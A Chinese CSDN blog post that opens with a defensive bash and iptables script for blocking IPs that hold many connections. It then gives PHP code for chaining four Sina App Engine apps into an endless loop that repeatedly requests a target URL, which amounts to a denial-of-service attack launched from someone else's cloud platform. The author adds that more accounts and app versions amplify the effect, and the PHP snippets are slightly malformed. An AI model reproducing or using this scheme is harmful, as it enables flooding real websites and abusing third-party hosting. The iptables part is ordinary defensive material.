ddos防御脚本2

最新推荐文章于 2024-05-31 09:33:37 发布
最新推荐文章于 2024-05-31 09:33:37 发布
阅读量2.3w 收藏 2
点赞数 6
分类专栏: 保存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010563350/article/details/112520063
版权 
1.编写脚本

mkdir /root/bin

vi /root/bin/dropip.sh

#!/bin/bash

/bin/netstat -na|grep ESTABLISHED|awk ‘{print $5}’|awk -F: ‘{print $1}’|sort|uniq -c|sort -rn|head -10|grep -v -E ’192.168|127.0′|awk ‘{if ($2!=null && $1>4) {print $2}}’>/tmp/dropip

for i in $(cat /tmp/dropip)

do

/sbin/iptables -A INPUT -s $i -j DROP

echo “$i kill at `date`”>>/var/log/ddos

done

2.增加执行权限

chmod +x /root/bin/dropip.sh

3.添加到计划任务,每分钟执行一次

crontab -e

*/1 * * * * /root/bin/dropip.sh

说明:

最重要的是第二行,获取ESTABLISHED连接数最多的前10个ip并写入临时文件/tmp/dropip,排除了内部ip段192.168|127.0开头的.通过for循环将dropip里面的ip通过iptables全部drop掉,然后写到日志文件/var/log/ddos

还一种方法就是利用php写ddos攻击,利用其它云平台来操作

主要使用sinaapp作为测试对象。

测试思路:创建4个版本的app.

版本1 主页代码如下:

  <php

  file_get_contents('http://2.mars.sinaapp.com/');//版本1触发攻击(访问版本2)

  >

版本2 主页代码:

  <php

  file_get_contents('http://www.xxx.com/ip.php')://攻击目标

  file_get_contents('http://3.mars.sinaapp.com/');//访问版本3

  >

版本3 主页代码:

  <php

  for ($i=1; $<=10; $i++){//这里邪恶了一下,多来几次效果更佳

  file_get_contents('http://www.xxx.com/ip.php');

  file_get_contents('http://4.mars.sinaapp.com/'); }

  >

版本4 主页代码:

  <php

  file_get_contents('http://2.mars.sinaapp.com/');//访问版本2,导致死循环

  >

以上是使用一个sinaapp用户进行攻击的步骤,可以自己扩展,注册大量用户及创建更多的版本进行攻击。但在测试过程中发现,每个APP实际上有两个IP出口。使用多个用户效果会更好。`
zhen12321
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
安全加固脚本及解析等保2.0(仅供参考)
weixin_53532638的博客
08-16 5565
#!/bin/bash echo "已对密码进行加固,如果输入错误密码超过3次,则锁定账户!!" echo "备份文件!" cp /etc/pam.d/sshd /etc/pam.d/sshd.bak n=`cat /etc/pam.d/sshd | grep "auth required pam_tally2.so "|wc -l` if [ $n -eq 0 ];then sed -i '/%PAM-1.0/a\auth required pam_tally2.so deny=3 unlock_time
debian9 wireGuard一键安装脚本
12-05
亲测可以使用的debian9 wireGuard一键安装脚本
获得脚本所在文件的路径
热门推荐
I have a adream
12-28 1万+
运行如下脚本可以获得脚本所在的文件夹的路径,如果脚本为软链接,则获得实际文件所在的文件夹路径。 #!/bin/bash SOURCE=&quot;${BASH_SOURCE[0]}&quot; while [ -h &quot;$SOURCE&quot; ]; do # resolve $SOURCE until the file is no longer a symlink DIR=&quot;$( cd -P &quot;$( dirname
DDoS PHP脚本:一个功能强大的网络测试工具
最新发布
gitblog_00073的博客
05-31 390
DDoS PHP脚本:一个功能强大的网络测试工具 项目地址:https://gitcode.com/drego85/DDoS-PHP-Script 在网络安全日益重要的今天,了解并防御分布式拒绝服务(DDoS)攻击变得至关重要。我们荣幸地向您推荐一款由Andrea Draghetti及其团队开发的开源项目——DDoS PHP Script,这是一款利用PHP语言实现的DDoS UDP洪水攻击模拟工...
一键脚本搭建wrieguard
qq_35827483的博客
01-27 1万+
wireguard搭建教程
WordPress网站安全防护插件Nintechnet
Bluehost_China的博客
03-29 5160
Nintechnet 是一款非常出色的Wordpress网站安全防护插件,从某种意义上来说,它的安全防护能力可以媲美wordfence这款安全防护插件。
secureCRT - WR脚本
06-22
主要实现secureCRT(7.2.4)中以下2种命令中的数据与代码分离,并使数据可共享。 crt.Screen.WaitForString <……> crt.Screen.Send <……>
全套发包机搭建教程附带脚本
04-01
总的来说,这个教程和脚本集合提供了一个深入学习DDoS攻击的平台,但需要注意的是,这种知识应仅用于教育和防御目的,非法使用可能会触犯法律,对网络环境造成破坏。对于网络安全专业人士来说,了解攻击手段可以帮助...
全套发包机搭建教程附带脚本.7z
12-26
2. **脚本文件**:这些可能是用Python、Perl、Go或其他语言编写的,用于生成和发送数据包的脚本脚本可能包含了不同类型的攻击模式,如SYN flood、UDP flood或HTTP GET/POST flood等。 3. **配置示例**:提供了...
Sql.rar_数据库 脚本
09-14
首先,数据库脚本是程序员或DBA(数据库管理员)用来创建、修改或操作数据库结构的文本文件。这些脚本通常使用SQL(Structured Query Language)编写,这是一种标准化的语言,用于管理关系型数据库系统。SQL脚本可以...
解析JavaScript实现DDoS攻击原理与保护措施
11-27
DDos介绍 最普遍的攻击是对网站进行分布式拒绝服务(DDoS)攻击。在一个典型的DDoS攻击中,攻击者...浏览器会读取script标签中的src属性并运行它所指向的脚本,其实不只是script标签可以用来攻击,简单来说只要是可以跨
网站如何应对DDoS攻击
08-25
网站如何应对DDoS攻击 DDoS(Distributed Denial of Service,分布式拒绝服务攻击)是一种常见的网络攻击方式,...DDoS攻击是一个严重的网络安全问题,需要企业和个人采取积极的防御措施来保护自己的网站和服务器。
防止网站被ddos攻击
07-28
::: 功能特性简介 ::: 防CC,防篡改,注入防御,提权防御,上传防御,未知0day防御,异形脚本防御等等。 防止黑客入侵和提权,让服务器更安全。 ?『目录限制』 有效防止入侵者通过脚本上传危险程序或代码,让服务运行于安全状态。 ?『执行限制』 防范入侵者执行危险程序,防范提权的发生。 ?『网络限制』 禁止脚本连接本机的危险端口,如常见的Serv-U提权端口,防范通过第三方软件的网络端口进行提权 禁止UDP向外发送,可有效防范UDP的DDOS攻击,如PHPDDOS等,有效限制网络带宽给恶意占用 ?『执行限制』 防范入侵者执行危险程序,防范提权的发生。 ?『组件限制』 禁止危险的组件,让服务器更安全。 ?『注入防御』 防范因网站有注入问题导致服务器给入侵。 ?『3389防御』 防范黑客未经许可登陆你的3389,让服务器更安全! ?『防CC攻击』 让网站免受CC攻击困扰! ?『禁止下载某文件类型』 防止不该给下载的文件给下载,防止信息外露! ?『允许执行的脚本扩展名』 有效的防止未经允许的扩展名脚本恶意执行,如:CER,CDX 等扩展名的木马。或是 /1.asp/1.gif 等会执行的情况 ?『禁止如下目录执行脚本』 防止图片和上传等可写目录执行脚本 ?『防范工具扫描网站目录和文件信息』 让入侵者不容易知道你的网站结构 ?『防范MSSQL数据库错误信息反馈暴露表或数据信息』 防范信息暴露。
Python卡证识别脚本2.0版本,采用百度智能云OCR方案,速度和准确度都UP!UP!!
Robin122117的博客
07-27 2514
需要安装requests,pandas库,另外关于token的获取,可以自行到百度智能云官方查看如何获取哦,有视频讲解,很方便的。
Linux Polkit权限提升漏洞复现(CVE-2021-4034)
weixin_45945976的博客
01-26 7532
Linux Polkit权限提升漏洞 CVE-2021-4034 漏洞描述 Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。 漏洞影响 Polkit > 2009 漏洞复现 from ctypes import * from ctypes.util import find_library impo
AT_W2:浅谈WinRunner脚本录制技巧(9.16-9.21)
purify_jj的专栏
09-16 5135
结合自己在这段时间内WinRunner的使用过程中,谈谈使用WR录制测试脚本时的一些技巧?或者也可以把自己碰到的问题,以及解决办法跟大家分享,若不能解决的,也可以和大家讨论下解决方法。
脚本防检测防封实战教程
qq_57003296的博客
04-14 1万+
1.进程保护工具基础原理 2.基础设置与自身保护 3.大漠综合工具保护 4.易语言的保护 爱内涵论坛收集整理
2022新JI卫云域名防红/防封程序源码+已去除授权
hyjer的博客
06-06 2114
2022新JI卫云域名防红/防封程序源码+已去除授权,JI卫云防红系统,双重跳转,程序非常稳定,生成短链接均支持在QQ_微信内部直接强行打开,也是支持iOS端的。功能:wwau.lanzouf.com/iO5500605pfc
如何防止跨站点脚本 (XSS) 攻击完整指南
allway2的博客
07-24 2620
XSS被认为是最危险的攻击之一,因为它的主要目的是窃取网站或系统的用户身份。在这种类型的攻击中,恶意代码或脚本被保存在网络服务器上(例如,在数据库中),并在用户每次调用适当的功能时执行。根据我的软件测试经验,我想补充一点,如果选择了一个好的黑盒测试技术并准确地执行,那么这应该足够了。如果恶意用户将此脚本注入网站代码,那么它将在用户的浏览器中执行,并将cookie发送给恶意用户。重要的是要记住,结果意味着什么,应用程序是易受攻击的,它会彻底分析结果。但是,插件被认为是检查此类攻击的相当薄弱的工具。...
物联网DDOS防御脚本
05-22
3. 安装DDoS防御软件:安装DDoS防御软件,如mod_evasive、Fail2ban等,可以有效地防止大量恶意请求和暴力破解等攻击。 4. 升级固件和软件:定期升级物联网设备的固件和软件,修复已知漏洞和安全问题,避免被攻击者...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值